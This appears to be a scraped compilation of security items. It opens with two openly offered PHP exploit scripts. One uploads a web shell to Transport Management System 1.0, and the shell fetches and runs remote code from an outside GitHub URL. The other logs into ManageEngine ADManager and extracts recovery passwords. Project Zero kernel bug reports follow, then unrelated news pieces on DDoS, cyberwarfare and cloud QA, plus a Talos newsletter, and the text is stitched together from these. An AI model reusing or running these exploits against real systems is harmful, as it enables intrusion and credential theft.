Transport Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Transport Management System 1.0 php code injection Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.xyz/download/project/user/2022/202203/kashipara.com_transport-management-syste.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a shell.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 2.php 127.0.0.1/Transport-Management/[+] payload :<?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'submit' => '',        'vehregno' => '3',    'vehchesis' => '00213771818860',    'vehdescription' => 'hacked by indoushka',    'file' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),            'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/newvehicle.php");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/vehicle picture/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Transport Management System 1.0 Code Injection

ManageEngine ADManager version 7183 suffers from a password hash disclosure vulnerability.

    =============================================================================================================================================| # Title     : ManageEngine ADManager 7183 Password Hash Disclosure Vulnerability                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.manageengine.com/products/ad-manager/                                                                           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] ManageEngine ADManager Plus versions prior to build 7183 suffers from a  Password Hash disclosure vulnerability..[+] save code as poc.php .[+] USage : php poc.php -t <target_url> -a <auth> -u <username> -p <password>[+] PayLoad :<?php// تعطيل تحذيرات HTTPSerror_reporting(0);function getPass($target, $auth, $user, $password) {    // تهيئة Session    $ch = curl_init();        // تحويل نوع المصادقة إذا كان ADManager    if (strtolower($auth) == 'admanager') {        $auth = 'ADManager Plus Authentication';    }        // بيانات تسجيل الدخول    $data = http_build_query([        "is_admp_pass_encrypted" => "false",        "j_username" => $user,        "j_password" => $password,        "domainName" => $auth,        "AUTHRULE_NAME" => "ADAuthenticator"    ]);        // إعدادات الطلب    $url = $target . 'j_security_check?LogoutFromSSO=true';    curl_setopt($ch, CURLOPT_URL, $url);    curl_setopt($ch, CURLOPT_POST, true);    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);    curl_setopt($ch, CURLOPT_HTTPHEADER, [        "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",        "Content-Type: application/x-www-form-urlencoded"    ]);    // إرسال الطلب    $response = curl_exec($ch);        // التحقق من المصادقة    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);    if (strpos($response, 'Cookie') !== false) {        echo "[+] Authentication successful!\n";    } elseif ($http_code == 200) {        echo "[-] Invalid login name/password!\n";        exit(0);    } else {        echo "[-] Something went wrong!\n";        exit(1);    }    // استرجاع كلمة المرور    for ($i = 1; $i <= 5; $i++) {        echo "[*] Trying to fetch recovery password for domainId: $i!\n";        $passUrl = $target . 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' . $i . '%22%7D';        curl_setopt($ch, CURLOPT_URL, $passUrl);        curl_setopt($ch, CURLOPT_POST, false);        $passResponse = curl_exec($ch);                if ($passResponse) {            echo $passResponse . "\n";        }    }    curl_close($ch);}function get_args() {    global $argv;    $args = [        'target' => '',        'auth' => '',        'user' => '',        'password' => ''    ];    for ($i = 1; $i < count($argv); $i++) {        switch ($argv[$i]) {            case '-t':            case '--target':                $args['target'] = $argv[++$i];                break;            case '-a':            case '--auth':                $args['auth'] = $argv[++$i];                break;            case '-u':            case '--user':                $args['user'] = $argv[++$i];                break;            case '-p':            case '--password':                $args['password'] = $argv[++$i];                break;        }    }    return $args;}function main() {    $args = get_args();    if (!$args['target'] || !$args['auth'] || !$args['user'] || !$args['password']) {        echo "Usage: php exploit.php -t <target_url> -a <auth> -u <username> -p <password>\n";        exit(1);    }    getPass($args['target'], $args['auth'], $args['user'], $args['password']);}main();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

ManageEngine ADManager 7183 Password Hash Disclosure

An incorrect searching algorithm in fastrpc_mmap_find can lead to kernel address space information leaks.

    Inside of fastrpc_mmap_find, there exists the following code to search for ADSP_MMAP_HEAP_ADDR or ADSP_MMAP_REMOTE_HEAP_ADDR allocations:hlist_for_each_entry_safe(map, n, &me->maps, hn) {      if (va >= map->va &&      va + len <= map->va + map->len &&      map->fd == fd) {          if (refs) {              if (map->refs + 1 == INT_MAX) {                   spin_unlock_irqrestore(&me->hlock, irq_flags);                   return -ETOOMANYREFS;              }             map->refs++;          }          match = map;          break;      }                  }   This code is wrong at a couple different levels, particularly in the case of a fastrpc_mmap_create-->fastrpc_mmap_find call coming from userland such as in the FASTRPC_IOCTL_MEM_MAP ioctl. I think this code path may not be intended to be reachable from userland at all - although even for requests issued from kernel-land, the contract for this code appears to have some correctness issues. This code uses map->va for finding an associated mapping which for these heap addresses comes from a call to dma_alloc_attrs inside of fastrpc_alloc_cma_memory.  dma_alloc_attrs has two different modes of operation - one returns a kernel virtual address to the allocated memory, and the other returns a struct page pointer that serves as an opaque cookie for the allocated memory. We have the latter case for this invocation of dma_alloc_attrs because of the DMA_ATTR_NO_KERNEL_MAPPING flag applied in fastrpc_mmap_create_remote_heap. We can see this looking at the debugfs-visible global file in the adsprpc directory:===================================  GMAPS  ====================================  fd                  |phys                |size                |va                    --------------------------------------------------------------------------------  -1                  |0xE883A000          |0x1000              |0xFFFFFFFE01A20E80       -1                  |0xE8839000          |0x1000              |0xFFFFFFFE01A20E40       -1                  |0xE8838000          |0x1000              |0xFFFFFFFE01A20E00       -1                  |0xE8837000          |0x1000              |0xFFFFFFFE01A20DC0       -1                  |0xE8836000          |0x1000              |0xFFFFFFFE01A20D80       -1                  |0xE8835000          |0x1000              |0xFFFFFFFE01A20D40       0                   |0xE8834000          |0x1000              |0xFFFFFFFE01A20D00       0                   |0xE8833000          |0x1000              |0xFFFFFFFE01A20CC0       0                   |0xE8832000          |0x1000              |0xFFFFFFFE01A20C80       -1                  |0xE8900000          |0x200000            |0xFFFFFFFE01A24000      This means we end up comparing a userland supplied value against a kernel page pointer - behavior of the kernel ioctl FASTRPC_IOCTL_MEM_MAP differs in userland visible ways based on the outcome of the comparison, meaning that userland can leak kernel page pointer addresses by "guessing" a possible address and observing the resulting error code. Here is the output from the attached PoC on a Samsung S23:  dm1q:/data/local/tmp $ ./poc  Detected address 0xfffffffe01c00000  Final address: 0xfffffffe01a24000   Additionally, because map->va is a struct page pointer as opposed to a genuine address to the underlying buffer, the usage of map->va + map->len is incorrect, and can lead to there being multiple map matches for the same calling parameters.  **This bug is subject to a 90-day disclosure deadline. If a fix for this**  **issue is made available to users before the end of the 90-day deadline,**  **this bug report will become public 30 days after the fix was made**  **available. Otherwise, this bug report will become public at the deadline.**  The scheduled deadline is 2024-09-22.   **For more details, see the Project Zero vulnerability disclosure policy:**  **https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-**   **policy.html** Related CVE Number: CVE-2024-33060.

fastrpc_mmap_find Information Leak

There appears to be some (possibly deprecated) code associated with AF_QIPCRTR sockets in bpf_service.c. Within this file are some ioctl handlers - e.g. qrtr_bpf_filter_attach and qrtr_bpf_filter_detach. In the case of qrtr_bpf_filter_detach, the global pointer bpf_filter is fetched and freed while only holding a socket lock (and an irrelevant rcu_read_lock) - this may lead directly to double frees or use-after-free (kernel memory corruption) if a malicious user is able to call the QRTR_DETTACH_BPF ioctl on multiple AF_QIPCRTR sockets at once. Based on Android SELinux files, it appears this may be possible from some lower-privileged vendor and HAL services.

    There appears to be some (possibly deprecated) code associated with AF_QIPCRTR sockets in bpf_service.c. Within this file are some ioctl handlers - e.g. qrtr_bpf_filter_attach and qrtr_bpf_filter_detach.In the case of qrtr_bpf_filter_detach, the global pointer bpf_filter is fetched and freed while only holding a socket lock (and an irrelevant rcu_read_lock) - this may lead directly to double frees or UAF (kernel memory corruption) if a malicious user is able to call the QRTR_DETTACH_BPF ioctl on multiple AF_QIPCRTR sockets at once. Based on Android SELinux files, it appears this may be possible from some lower-privileged vendor and HAL services.As we don't have a device (nor see any examples of existing Android devices) containing the necessary kernel configuration (CONFIG_QRTR_BPF_FILTER), we are presently unable to reproduce a crash for this bug. If you're aware of this option being enabled on any production kernels, I would be interested to know!This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-09-22.For more details, see the Project Zero vulnerability disclosure policy:https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.htmlNOTE:This was originally reported as a non-security issue on June 17th, however Qualcomm has confirmed that there are affected devices and that they consider this a security issue, so adding this to the tracker.Related CVE Number: CVE-2024-38401.

Android qrtr_bpf_filter_detach Double-Free / Use-After-Free

Cloud-based solutions are transforming the software quality assurance (QA) industry. As organizations increasingly migrate their development and verification…

Cloud-based solutions are transforming the software quality assurance (QA) industry. As organizations increasingly migrate their development and verification processes to the cloud, QA teams gain access to unprecedented scalability, flexibility, and efficiency. This shift is enabling teams to optimize their workflows, better handle growing demands, and respond more swiftly to project needs.

Companies can now accelerate their evaluation cycles, enhance collaboration, and reduce costs, all while leveraging the latest technological advancements. Cloud-based platforms offer a unified environment where QA professionals, developers, and managers can work together seamlessly, regardless of their physical location. This transformation is rapidly becoming a cornerstone of modern software development.

According to AI-powered QA management tool and service provider Aqua Cloud, addressing key pain points in the software validation process requires thorough diligence. Therefore, teams must focus on higher-value activities by simplifying repetitive processes using Aqua Cloud’s AI-powered capabilities and automation tools.

Centralizing quality management in a single ecosystem helps to remove silos and guarantees seamless processes, hence greatly lowering the inefficiencies often afflicting dispersed QA systems.

****The Scalability and Flexibility of Cloud-Based Quality Assurance****

One of the primary advantages of cloud-based solutions is the ability to scale QA environments quickly and efficiently. Traditional on-premise infrastructure requires significant investment in hardware and maintenance, which limits the capacity to scale as demand increases. 

In contrast, cloud-based platforms allow QA teams to scale up or down depending on their current needs, whether they handle small-scale projects or manage enterprise-level applications. This scalability improves resource allocation and reduces the time needed to set up validation environments.

Additionally, cloud-based platforms provide unmatched flexibility. Teams can access QA environments from anywhere, facilitating global collaboration. As remote work becomes more common, the cloud’s accessibility ensures that quality assurance professionals and developers can work together without geographic constraints. This collaborative environment fosters better communication and faster resolution of issues, helping to meet tight development deadlines.

****Cost Efficiency Through Pay-as-You-Go Models****

Cost savings are a critical factor driving the adoption of cloud-based QA solutions. Traditional quality assurance infrastructures require substantial upfront capital investment in hardware, licenses, and ongoing maintenance. Cloud-based platforms, on the other hand, operate on a pay-as-you-go model, meaning that organizations only pay for the resources they use. This allows businesses to optimize their budgets, especially when workloads fluctuate.

The cloud also eliminates the need for dedicated physical infrastructure, reducing not only hardware costs but also associated overheads like energy consumption and IT staff for maintenance. The savings can be redirected toward improving other areas of software development and quality assurance, such as hiring additional QA specialists or investing in advanced tools.

****Enhanced Cooperation and Automation****

In today’s fast-paced software development lifecycle (SDLC), collaboration is essential to delivering high-quality software products. Cloud-based platforms enhance collaboration by providing a centralized repository where all team members can access QA data in real-time. This transparency ensures that everyone — from quality managers to QA professionals and developers — clearly understands the progress and can act swiftly to resolve issues.

Automation is another significant benefit offered by cloud-based solutions. Automated tools integrated within these platforms reduce the need for manual intervention, allowing QA teams to run extensive validation cases without delays. This is particularly useful for repetitive tasks like regression checks, where automation can dramatically cut down the time required for execution. As a result, QA teams can shift their focus to more critical aspects of the process, such as exploratory assessments or improving coverage.

****Improved Security and Compliance****

Security is a primary concern for businesses, particularly those in regulated industries such as healthcare and finance. Cloud-based solutions have evolved to offer strong security features that ensure data integrity and confidentiality. Leading cloud service providers often offer advanced encryption, multi-factor authentication, and compliance with international security standards.

Moreover, cloud-based QA platforms help organizations meet regulatory requirements by providing audit-ready documentation and traceability. Every action within the quality assurance process is logged, ensuring that companies can prove compliance during audits. This feature is invaluable for industries requiring strict data handling and security protocols.

****Integration with Existing Tools****

Another major advantage of cloud-based solutions is their ability to integrate seamlessly with existing tools and frameworks used in the software development lifecycle. Many QA teams rely on a mix of open-source and proprietary tools, which can be difficult to synchronize when operating on traditional infrastructures. Cloud platforms simplify this process by offering pre-built integrations with popular tools like Jira, Jenkins, and Azure DevOps.

This interoperability reduces the complexity of managing multiple systems and eliminates data silos. When all tools are connected within the cloud ecosystem, it becomes easier for teams to share information, monitor performance, and ensure that the entire software development process runs smoothly.

Cloud-based solutions are transforming the infrastructure of software quality assurance, offering unmatched scalability, flexibility, and cost-efficiency. As businesses continue to embrace digital transformation, cloud-based QA solutions will play an increasingly vital role in ensuring the success of software development projects, eliminating inefficiencies, and taking away the pains that have traditionally been associated with the quality assurance process.

1.  Best Practices for Cloud Computing Security
2.  How To Safeguard Your Data With Cloud MRP System
3.  The Role of DevOps in Streamlining Cloud Migration Processes
4.  Insights on Google Cloud Backup and Disaster Recovery Service
5.  Risk Management Strategies: Incorporating Cloud WAFs into Plan

How Cloud-Based Solutions Are Transforming Software Quality Assurance

Internet infrastructure provider Cloudflare fends off a massive 3.8 Tbps DDoS attack, surpassing the previous record. Learn how…

Internet infrastructure provider Cloudflare fends off a massive 3.8 Tbps DDoS attack, surpassing the previous record. Learn how Cloudflare’s advanced security measures protected its customers from this unprecedented cyber threat.

Internet infrastructure provider Cloudflare has successfully repelled a massive distributed denial-of-service (DDoS) attack that reached a staggering 3.8 terabits per second (Tbps) and 2.14 billion packets per second (PPS), confirmed the company’s CEO, Matthew Prince. This unprecedented assault surpasses the previous record of 3.47 Tbps DDoS attack with a packet rate of 340 million PPS encountered by Microsoft in November 2021.

> Not all records you’re happy about breaking: @Cloudflare recently mitigated the largest ever reported hyper-volumetric #DDoS attack. 3.8 terabits per second (Tbps) and 2.14 billion packets per second (Bpps). Handled automatically any without any customer impact. Details to come. pic.twitter.com/SuHZsqCEFV
> 
> — Matthew Prince 🌥 (@eastdakota) October 1, 2024

The attack was part of a month-long hacking campaign that began in early September 2024. These attacks, designed to overwhelm a website or app with internet traffic, aimed to force Cloudflare’s customers offline. Over 100 volumetric DDoS attacks were launched during this period, with many exceeding 3 Tbps and mainly originating from Vietnam, Russia, Brazil, Spain, and the US.

The hackers utilized a botnet consisting of hijacked internet devices, including Asus and MikroTik routers, DVRs, and web servers. 

“The high bitrate attacks appear to originate from a large number of compromised ASUS home routers, likely exploited using a CVE 9.8 (Critical) vulnerability that was recently discovered by Censys,” Cloudflare researchers noted.

The botnet leveraged the User Datagram Protocol (UDP) to generate massive amounts of traffic, overwhelming Cloudflare’s targets. The attacks were primarily focused on volumetric L3/4 DDoS, which aims to exhaust a target’s bandwidth and resources. The target was a customer of an unnamed hosting provider.

While the attacks were severe, Cloudflare was able to mitigate them without significant disruption to its customers. Cloudflare’s global network of individual servers and advanced traffic analysis systems were instrumental in mitigating the record-breaking attack. The company’s ability to distribute incoming traffic and filter out malicious data flow enabled it to effectively defend its customers. 

The DDoS campaign targeted various industries, including finance, internet, and telecommunications. The company’s strong network and defence systems ensured that most customers experienced minimal downtime or service degradation.

The threat actors behind the campaign exploited hijacked internet devices, such as routers, DVRs, and web servers, to form a botnet. This botnet leveraged the User Datagram Protocol (UDP) to generate massive amounts of traffic, overwhelming Cloudflare’s targets.

Despite Cloudflare’s successful defence of this record-breaking DDoS attack, the incident highlights the growing sophistication of cyber threats and the importance of adopting reliable internet infrastructure.

The development of new attack techniques and accessible tools makes it easier for attackers to launch large-scale attacks. As online services continue to expand, the need for advanced security measures to protect against such attacks becomes increasingly critical.

1.  Cloudflare thwarts largest reported HTTP DDoS attack
2.  Microsoft Azure customer hit by 2.4 Tbps DDoS attack
3.  Record-Breaking DDoS Attack Against European Firm Mitigated
4.  Kaspersky Reveals Alarming IoT Threats, Dark Web DDoS Boom
5.  Google, Cloudflare, AWS Disclose Largest DDoS Attack in History

Cloudflare Mitigates Record Breaking 3.8 Tbps DDoS Attack

"Pig butchering," generative AI, and spear-phishing have all transformed digital warfare.

Source: Daniren vua Alamy Stock Photo

As the kinetic war between Russia and Ukraine persists, a parallel battle is being waged in cyberspace, where hackers are targeting critical infrastructure, government entities, and individual service personnel.

The cyber campaigns focus on espionage, disruption, and social engineering to weaken Ukrainian defenses and sow discord, with efforts to compromise personal data and infiltrate secure communication channels like Signal and Telegram.

Russian-aligned cyber actors, including advanced persistent threat (APT) groups like Gamaredon, have intensified their attacks since Russia's 2022 invasion of Ukraine.

Despite Ukrainian efforts to bolster cybersecurity, Russian hackers continue to refine their tools, and Russian cyber warfare tactics are varied and persistent, according to Ukraine's State Service of Special Communications and Information Protection (SSSCIP) September report.

These are just a few of the latest examples of cyberwarfare between the two states, though other additional malware perpetrators and cyberattack units, including Sandworm (aka APT44), continue to proliferate. 

**Messaging Apps Target Service Members**

One recent campaign involves the Russia-aligned UAC-0184 group targeting Ukrainian military personnel through messaging apps, including Signal. 

Hackers impersonate familiar contacts, sending malicious files disguised as combat footage or recruitment material to infect devices with malware.

Dan Black, manager, Mandiant Cyber Espionage Analysis, Google Cloud, says common technologies like smartphones and tablets have become essential tools for military personnel on the front lines, providing real-time intelligence and other critical support capabilities.

"But their utility cuts both ways," he cautions.

Because they provide such valuable capability, penetrating these devices can provide an adversary a surreptitious lens into various types of sensitive battlefield information that can have grave, even lethal, consequences for targets if compromised. 

Abu Qureshi, head of threat research for BforeAI, explains targeted cyberattacks aimed at military personnel through messaging apps can severely compromise operational security.

"By intercepting communications or distributing malware through trusted communication channels, attackers can extract sensitive data on the physical locations of personnel," Qureshi says. "This can lead to real-world consequences."

Malachi Walker, security adviser for DomainTools, adds a targeted cyberattack such as what’s being seen in the Russian/Ukrainian war is like pig-butchering attacks the team has observed in the financial service sector, where an attacker builds a personal relationship with their victim, gaining their trust over a period to gain a payout.

"Seeing this tactic used in warfare, rather than for financial gain, impacts the operational security of a military unit," Walker explains.

He says while a financially motivated pig-butchering attack can only leave one victim, using this technique in a war setting could place an entire group of soldiers in danger.

Adam Gavish, co-founder and CEO at DoControl, says what's particularly concerning is that many of these troops have access to sensitive intelligence and critical systems.

"A successful attack could potentially compromise not just individual soldiers, but entire military operations or strategies," he says.

The ripple effects of a single breach could harm many, making these personalized attacks especially dangerous.

"All of this can significantly impact combat effectiveness, readiness, and overall military capabilities," Gavish says.

**Russian-Speaking Users Targeted**

Meanwhile, the DCRat Trojan has been deployed through HTML smuggling, marking a shift in delivery methods to target Russian-speaking users. 

HTML smuggling techniques can bypass traditional security measures by nesting attacks within obfuscation layers like files, posing a significant threat to critical industries during conflicts.

Walker explains the use of HTML smuggling may not be the sole cause for change in the threat landscape, but it is indicative of an ongoing change that his team has observed in the past two years.

"The evolution of cyberattacks and malware, particularly those that have an intersection with the use of generative AI, have lowered the barrier for entry for threat actors, leading to more threats and a greater volume of attacks," he says.

DCRat and other similar malware can infiltrate systems controlling power grids, oil pipelines, and even nuclear facilities, which could severely disrupt the safety of any nation. "In the context of targeting Russian-speaking users and Russian companies, such attacks could have an impact that extends to other countries and companies and leads to further distrust," Walker adds.

He notes not all Russian companies are sanctioned by NATO-allied countries and those not sanctioned could be the most appealing targets as it would allow these threat actors to extend their reach.

These impacts can have a global impact including the delay of delivery for essential goods and the compromise of critical industries like energy, healthcare, financial services, and transportation.

Stephen Kowski, field chief technology officer (CTO) at SlashNext Email Security+, says this method of attack highlights the need for more sophisticated defense strategies that go beyond conventional antivirus solutions. 

"When looking at this phishing technique you need live analysis of malicious content within the file and that is why you cannot rely on signature-based, feeds-based phishing protection alone," he explains. 

He adds securing industrial control systems is paramount in preventing disruptions that could amplify physical attacks.

"A comprehensive approach involving regular security audits, network segmentation, and robust access controls can help safeguard energy infrastructure against supply chain attacks," Kowski says. 

**Game on for Gamaredon **

An ESET report released last month focused on the 2022 and 2023 campaigns of Gamaredon, one of the most active groups in Ukraine.

The group has been conducting spear-phishing campaigns and using custom malware to breach Ukrainian government institutions, with the attacks undergoing constant evolution — for example, shifting to PowerShell and VBScript-based attacks.

DoControl's Gavish says Gamaredon's persistent approach, while less stealthy, can be highly effective in overwhelming Ukraine's defenses through sheer volume. 

"This constant barrage of attacks ties up cybersecurity resources and increases the chances of a successful breach simply through persistence," he says. The real-world impact forces Ukraine to constantly divert resources to cyber defense. "Gamaredon's attempts to target NATO countries have significant implications for international cybersecurity cooperation," Gavish adds.

From his perspective, these types of threats highlight the need for increased information sharing and joint defense strategies among allied nations. "The situation in Ukraine serves as a stark reminder that cybersecurity is not just an IT issue — it's a matter of national security with very real-world consequences," Gavish says. 

**About the Author**

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.

Ukraine-Russia Cyber Battles Tip Over Into the Real World

Despite what lessons we thought we learned from Colonial Pipeline, none of those lessons have been able to be put into practice.

Thursday, October 3, 2024 14:00

Government-run water systems and other critical infrastructure are still at risk from state-sponsored actors, according to a renewed warning from the U.S. Cybersecurity and Infrastructure Security Agency.  

CISA released an advisory last week on the matter of days after a small water treatment facility in Kansas was forced into manual operations after a cyber attack.  

I feel like this is just the latest in a string of warnings that we’ve been talking about since the Colonial Pipeline attack in 2021 that forced a gasoline shortage across the Eastern U.S. We’ve been discussing the importance of defending critical infrastructure for years now, so what’s new now? 

For starters, it seems like the frequency of these attacks seems to be on the rise. And many efforts to regulate cybersecurity policies and procedures in the industry have thus far fallen flat. 

The White House is reportedly working on rolling out a second wave of cybersecurity recommendations for water treatment facilities on the back of the attack in Kansas that affected the public water supply of 11,000 people. Although the cyber attack did not actually affect anyone from getting their water, it does raise the question of how much of an issue this could be if a state-sponsored actor were to target a facility in a town with a larger population, or if there weren’t backup plans in place to operate the facility manually.  

The U.S. Environmental Protection Agency (EPA) said last year that it had to pull a memo outlining cybersecurity standards at water treatment plants because of constant legal action from state and federal lawmakers and private water companies. And the American Water Works Association (a non-profit lobbying organization representing more than 50,000 members) has advocated for facilities and groups like the AWWA to write their own cybersecurity policies rather than relying on the U.S. government.  

All of that is to say, despite what lessons we thought we learned from Colonial Pipeline, none of those lessons have been able to be put into practice, and we’re still where we were with cybersecurity policies and regulations three years ago.  

Despite urging from the industry and some lawmakers, I’ve yet to see these groups write any of their own policies, so even if they have that power, they don’t seem to be taking advantage of it. So when CISA puts out this type of alert again in a few months after whatever future incident lies ahead, I would expect to see more action from all parties involved rather than another round of words warning that attacks can, and will, happen. 

**The one big thing **

Talos has recently observed an attack leading to the deployment of a MedusaLocker ransomware variant known as “BabyLockerKZ.” This actor has been active since at least late 2022 and targets organizations worldwide, although the number of victims was higher than average in EU countries until mid-2023 and, since then, in South American countries. We assess with medium confidence that the actor is financially motivated, likely working as an IAB or an affiliate of a ransomware cartel. 

**Why do I care? **

The actor behind these attacks seems to be particularly active, infecting more than 100 organizations per month, according to Talos telemetry. This reveals the professional and highly aggressive nature of the attacks and is coherent with the activity we would expect from an IAB or ransomware affiliate. As with any ransomware, BabyLockerKZ looks to encrypt targets’ files and lock them down until the target pays the request ransom.  

**So now what? **

Talos has released several new Snort rules and ClamAV signatures that detect the activity of this group and BabyLockerKZ. This group is also known to use several publicly available tools in their attacks, such as Mimikatz, which are well-known to the security community at this point. For more on living-off-the-land binaries (LoLBins) that attackers like this one are increasingly using, read our blog post here.  

**Top security headlines of the week **

**International law enforcement agencies worked together to arrest and unmask four individuals believed to be associated with the LockBit ransomware group.** As part of this campaign, investigators have also linked one of the LockBit members to Evil Corp, a Russian-backed cybercrime gang. At a press conference announcing the arrests, representatives from the U.K.’s National Crime Agency said that Evil Corp maintained a “privileged” relationship with the Russian government and was often asked to carry out targeted cyber attacks against NATO countries. LockBit is traditionally associated with financially motivated ransomware attacks targeting private companies, regardless of the country in which they reside. Europol, the U.K. NCA, the U.S. FBI and Japan’s National Police have also worked together to create and release a decryptor that can unlock files affected by the LockBit ransomware. The same agencies have been working since last year to target and seize assets and servers belonging to LockBit. The threat actor has taken credit for several major attacks over the past several years, including those targeting Boeing, Volkswagen, multiple major international ports and government-owned computers in Fulton County, Georgia. (Europol, TechCrunch) 

**The latest version of the U.S.’s National Institute of Standards and Technology’s password recommendations drop complexity in favor of length.** NIST’s latest version of its Password Guidelines removes the recommendations that passwords use a mixture of character types and that they be changed often. Instead, the draft states that credential service providers (CSPs) recommend users create passwords between 15 and 64 characters that may include ASCII or Unicode characters. The previous version of the NIST standards led many users to adopt easy-to-guess passwords such as “Password1234!” or store the complicated passwords in easy-to-access places, such as written down on a piece of paper near their computer. CSPs are also instructed to drop knowledge-based authentication or security questions when selecting passwords. NIST standards are important because they formalize principles widely adopted by the U.S. government and major technology companies like Microsoft and Google. The latest draft also states that users only need to change their passwords in the event of a publicly reported data breach. (Infosecurity Magazine, Dark Reading) 

**A vulnerability in a web app from car manufacturer Kia could allow an attacker to view a car’s license plate, unlock the doors, and even remotely start the ignition.** The since-patched vulnerability in Kia’s web portal could allow attackers to essentially build and deploy their own web app and reassign control of the internet-connected features of most modern Kia vehicles. The vulnerability could have allowed an adversary to immediately ping the location of a targeted vehicle, process its license plate number, and even honk the horn. This is the second such vulnerability the group of researchers has disclosed to a Hyundai-owned company in the past two years. The vulnerability highlights the risk that modern vehicles come with, many of which rely on internet connectivity for some of their features or interface with web apps, websites or mobile phone apps. A proof of concept from the researchers included a dashboard that could allow an attacker to type in a license plate number and then retrieve the owner’s personal information, eventually adding themselves as an “owner” of the car and executing commands on the vehicle. (Wired, Security Week) 

**Can’t get enough Talos? **

*   Resurgence of Spam: Cisco Talos Sound Alarm on New Tactics 
*   Critical RCE vulnerability found in OpenPLC 
*   Simple Mail Transfer Pirates: How threat actors are abusing third-party infrastructure to send spam 

**Upcoming events where you can find Talos**

**MITRE ATT&CKcon 5.0** **(Oct. 22 - 23)** 

_McLean, Virginia and Virtual_

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

**it-sa Expo & Congress** **(Oct. 22 - 24)** 

_Nuremberg, Germany_

**White Hat Desert Con** **(Nov. 14)** 

_Doha, Qatar_

**misecCON** **(Nov. 22)** 

_Lansing, Michigan_

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting.

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
**MD5:** 71fea034b422e4a17ebb06022532fdde   
**Typical Filename:** VID001.exe   
**Claimed Product:** N/A   
**Detection Name:** RF.Talos.80 

**SHA 256:** 76491df69a26019139ac11117cd21bf5d0257a5ebd3d67837f558c8c9c3483d8   
**MD5:** b209df2951e29ab5eab4009579b10b8d  
**Typical Filename:** FileZilla\_3.67.1\_win64\_sponsored2-setup.exe   
**Claimed Product:** FileZilla   
**Detection Name:** W32.76491DF69A-95.SBX.TG

**SHA 256:** c20fbc33680d745ec5ff7022c282a6fe969c6e6c7d77b7cfac34e6c19367cf9a   
**MD5:** 3bc6d86fc4b3262137d8d33713ed6082   
**Typical Filename:** 8c556f0a.dll   
**Claimed Product:** N/A   
**Detection Name:** Gen:Variant.Lazy.605353 

**SHA 256:** f0d7a2bb0c5db162332418747ba4987027b8a746b24c919a24235ff3b70d25e3   
**MD5:** 0d849044612667362bc88780baa1c1b7   
**Typical Filename:** CryptX.dll   
**Claimed Product:** N/A    
**Detection Name:** Gen:Variant.Lazy.605353 

**SHA 256:** 331fdf5f1f5679a6f6bb0baee8518058aba8081ef8f96e57fa3b74291fcbb814   
**MD5:** f23b90fc9bc301baf3e399e189b6d2dc   
**Typical Filename:** B.dll   
**Claimed Product:** N/A     
**Detection Name:** Gen:Variant.Lazy.605353

CISA is warning us (again) about the threat to critical infrastructure networks

Google has revealed the various security guardrails that have been incorporated into its latest Pixel devices to counter the rising threat posed by baseband security attacks.
The cellular baseband (i.e., modem) refers to a processor on the device that's responsible for handling all connectivity, such as LTE, 4G, and 5G, with a mobile phone cell tower or base station over a radio interface.
"This

Mobile Security / Technology

